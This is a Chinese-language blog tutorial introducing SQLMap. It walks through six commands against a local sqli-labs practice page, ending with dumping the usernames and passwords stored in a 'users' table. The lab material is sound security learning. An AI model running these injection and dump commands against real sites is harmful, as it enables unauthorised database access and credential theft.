文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2019-10-11   428

Web安全学习之SQLMap入门学习

SQLMap注入神器,先就简单的介绍一下最最最最基础的用法,等图书馆什么时候收录了《SQLMap从入门到精通》这本书,再认真研究这个工具(其实看到这个书名就有点不适)。

使用SQLMap

使用sqli-labs的数据库和页面作为示例。

已知存在注入点http://localhost/sqlilabs/Less-1/,使用SQLMap对其提取管理员数据,具体步骤如下:

第一步:判断是否是注入点

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"

使用-u参数指定URL,如果URL存在注入点,将会显示出Web容器,数据库版本信息,如下所示:

第二步:获取数据库

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs

使用--dbs参数读取数据库,如下:

第三步:查看当前应用程序所用数据库

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db

第四步:列出指定数据库的所有表

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --tables -D "security"

使用--table参数获取数据库表,-D参数指定数据库,如下:

第五步:读取指定表中的字段名称

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --columns -T "users" -D "security"

使用--columns参数列取字段名,如下:

第六步:读取指定字段内容

sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dump -C "username, password" -T "users" -D "security"

--dump意味转存数据,-C指定字段名称,-T指定表名,-D指定数据库名称。

在读取数据后,SQLMap会把读取的数据转存到SQLMap/output/目录下。

Copyright © ca01h 2019-2020 | 本站总访问量